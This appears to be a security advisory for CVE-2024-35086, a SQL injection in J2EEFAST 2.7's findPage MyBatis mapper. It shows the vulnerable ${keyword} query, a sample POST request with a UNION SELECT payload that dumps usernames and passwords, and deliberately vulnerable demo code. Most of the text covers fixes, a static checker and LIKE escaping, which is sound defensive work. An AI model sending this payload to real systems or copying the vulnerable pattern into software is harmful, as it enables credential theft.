A critical SQL Injection vulnerability has been discovered in J2EEFAST version 2.7, tracked as CVE-2024-35086. The issue exists in the findPage statement of BpmTaskFromMapper.xml, a core MyBatis XML mapper file responsible for handling workflow task queries in this open-source Java-based enterprise platform.

If exploited, this flaw allows remote attackers to inject malicious SQL code and potentially gain access to sensitive data, manipulate the database, or escalate privileges within the application—all without authentication.

What is J2EEFAST?

J2EEFAST is a Java-based enterprise application platform used for building robust business workflow and management systems. It’s open-source and widely adopted for rapid enterprise application development, making vulnerabilities in it pose a heightened risk for organizations.

How the Vulnerability Occurs

The vulnerability stems from the use of MyBatis string substitution in the findPage statement. User-supplied input is spliced into the SQL text with ${} instead of being bound as a prepared-statement parameter with #{}, so the database parses whatever the user sends as part of the query.

Below you can see a simplified, vulnerable code excerpt:

<!-- BpmTaskFromMapper.xml -->
<select id="findPage" resultType="com.example.BpmTask">
  SELECT * FROM bpm_task
  WHERE status = #{status}
  AND task_name LIKE '%${keyword}%'
</select>

Notice the use of ${keyword} inside the SQL. MyBatis substitutes a ${} value literally into the statement text before it is sent to the database, so a value that comes directly from user input, without sanitization or parameterization, lets attackers inject arbitrary SQL code.

Here's a sample POST request that could exploit this vulnerability to dump all user table data:

POST /bpm/task/findPage HTTP/1.1
Host: vulnerable.com
Content-Type: application/json

{
  "status": "open",
  "keyword": "test%' UNION SELECT username, password FROM users --"
}

The resulting SQL looks like this:

SELECT * FROM bpm_task
WHERE status = 'open'
AND task_name LIKE '%test%' UNION SELECT username, password FROM users --%'

The attacker successfully retrieves username and password columns from the users table.

How to Fix

Immediate Workaround:
Disable access to the affected endpoint if possible.

Permanent Fix:
Use MyBatis #{} parameterization for all dynamic inputs and never use ${} for user-controlled data.
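A small static check helps enforce that rule across a code base. The following is an added example, not code from the advisory or from the J2EEFAST project: it parses a MyBatis mapper file and reports every ${...} token found inside a statement element. The two embedded mapper documents are constructed samples based on the excerpts above; the enclosing <mapper> root element and its namespace are assumptions, since the page only shows the <select>.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the advisory's vulnerable <select> wrapped in an assumed <mapper> root.
VULNERABLE_MAPPER = """<mapper namespace="com.example.BpmTaskFromMapper">
  <select id="findPage" resultType="com.example.BpmTask">
    SELECT * FROM bpm_task
    WHERE status = #{status}
    AND task_name LIKE '%${keyword}%'
  </select>
</mapper>
"""

# Constructed sample: the advisory's fixed <select>, same assumed root.
FIXED_MAPPER = """<mapper namespace="com.example.BpmTaskFromMapper">
  <select id="findPage" resultType="com.example.BpmTask">
    SELECT * FROM bpm_task
    WHERE status = #{status}
    AND task_name LIKE CONCAT('%', #{keyword}, '%')
  </select>
</mapper>
"""

# MyBatis statement elements whose text becomes SQL.
STATEMENT_TAGS = {"select", "insert", "update", "delete", "sql"}

# ${name} is string substitution; #{name} is a bound parameter and is not matched.
SUBST_RE = re.compile(r"\$\{[^}]*\}")


def find_string_substitutions(mapper_xml):
    """Return (statement id, token) pairs for every ${...} substitution inside a
    statement element. itertext() also covers text nested in <if>/<where> tags,
    so dynamic-SQL fragments are scanned as well."""
    root = ET.fromstring(mapper_xml)
    findings = []
    for stmt in root:
        if stmt.tag not in STATEMENT_TAGS:
            continue
        sql_text = "".join(stmt.itertext())
        for token in SUBST_RE.findall(sql_text):
            findings.append((stmt.get("id"), token))
    return findings


if __name__ == "__main__":
    for label, doc in (("vulnerable", VULNERABLE_MAPPER), ("fixed", FIXED_MAPPER)):
        print(label, find_string_substitutions(doc))
```

Every hit needs a human decision: ${} is legitimate for identifiers such as an ORDER BY column chosen from a server-side allow-list, but any hit whose value can originate from a request parameter is a finding to fix with #{}. Running the check in CI over every *Mapper.xml keeps new string substitutions from slipping in unnoticed.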

Safe Code Example

<select id="findPage" resultType="com.example.BpmTask">
  SELECT * FROM bpm_task
  WHERE status = #{status}
  AND task_name LIKE CONCAT('%', #{keyword}, '%')
</select>

Here, #{} binds the value as a prepared-statement parameter, so the database receives it as data and never parses it as part of the SQL text.
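To make the difference concrete, the following added example (not code from the advisory or from J2EEFAST) reproduces both mappings in Python against an in-memory SQLite database: one function splices the keyword into the SQL text the way ${keyword} does, the other binds it the way #{keyword} with CONCAT does. The tables, rows and the two-column bpm_task layout are constructed for the demonstration; SQLite's || operator stands in for CONCAT. It also shows a caveat the safe mapping alone does not address: #{} stops injection, but a bound keyword of "%" or "_" still acts as a LIKE wildcard, so a third variant escapes those characters.

```python
import sqlite3

# The keyword from the advisory's sample request.
PAYLOAD = "test%' UNION SELECT username, password FROM users --"


def make_db():
    """Constructed schema: two-column tables so the page's UNION lines up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE bpm_task (status TEXT, task_name TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO bpm_task VALUES ('open', 'test approval'),
                                    ('open', 'budget review'),
                                    ('closed', 'test archive');
        INSERT INTO users VALUES ('admin', 'hunter2-hash'), ('bob', 'bob-hash');
    """)
    return conn


def find_page_vulnerable(conn, status, keyword):
    """Mirrors the original mapper: #{status} is bound, ${keyword} is pasted into the SQL."""
    sql = ("SELECT * FROM bpm_task WHERE status = ? "
           "AND task_name LIKE '%" + keyword + "%'")
    return conn.execute(sql, (status,)).fetchall()


def find_page_safe(conn, status, keyword):
    """Mirrors the fixed mapper: both values are bound parameters."""
    sql = ("SELECT * FROM bpm_task WHERE status = ? "
           "AND task_name LIKE '%' || ? || '%'")
    return conn.execute(sql, (status, keyword)).fetchall()


def escape_like(value, esc="\\"):
    """Escape LIKE metacharacters so a bound keyword matches literally."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def find_page_safe_escaped(conn, status, keyword):
    """Bound parameter plus LIKE escaping: no injection and no wildcard surprises."""
    sql = ("SELECT * FROM bpm_task WHERE status = ? "
           "AND task_name LIKE '%' || ? || '%' ESCAPE '\\'")
    return conn.execute(sql, (status, escape_like(keyword))).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_page_vulnerable(db, "open", PAYLOAD))  # leaks users rows
    print("safe:      ", find_page_safe(db, "open", PAYLOAD))        # payload is just text
    print("safe, '%': ", find_page_safe(db, "open", "%"))            # wildcard matches all
    print("escaped:   ", find_page_safe_escaped(db, "open", "%"))    # literal '%' matches none
```

The vulnerable variant returns the users rows alongside the task rows because the database ran the UNION; the bound variant returns nothing because no task name contains the payload as literal text. Whether the wildcard behaviour of the bound version matters depends on the application: it is not injection, but an unescaped "%" lets any caller enumerate every row visible to the query.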

Original References

- NVD Listing for CVE-2024-35086
- J2EEFAST GitHub Repository
- MyBatis Security Best Practices

Recommendations

- Update to the latest version immediately (check official releases)
- Educate developers about SQL injection and safe parameterization practices

If you operate J2EEFAST in production, prioritize patching this vulnerability now. SQL injection is one of the most critical web flaws and has led to some of the largest breaches in history.


> *Stay secure! Always keep dependencies up-to-date and follow secure coding practices.*


*Written exclusively for your security reading by AI Security Insights (2024).*

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 08/02/2024 03:07:46 UTC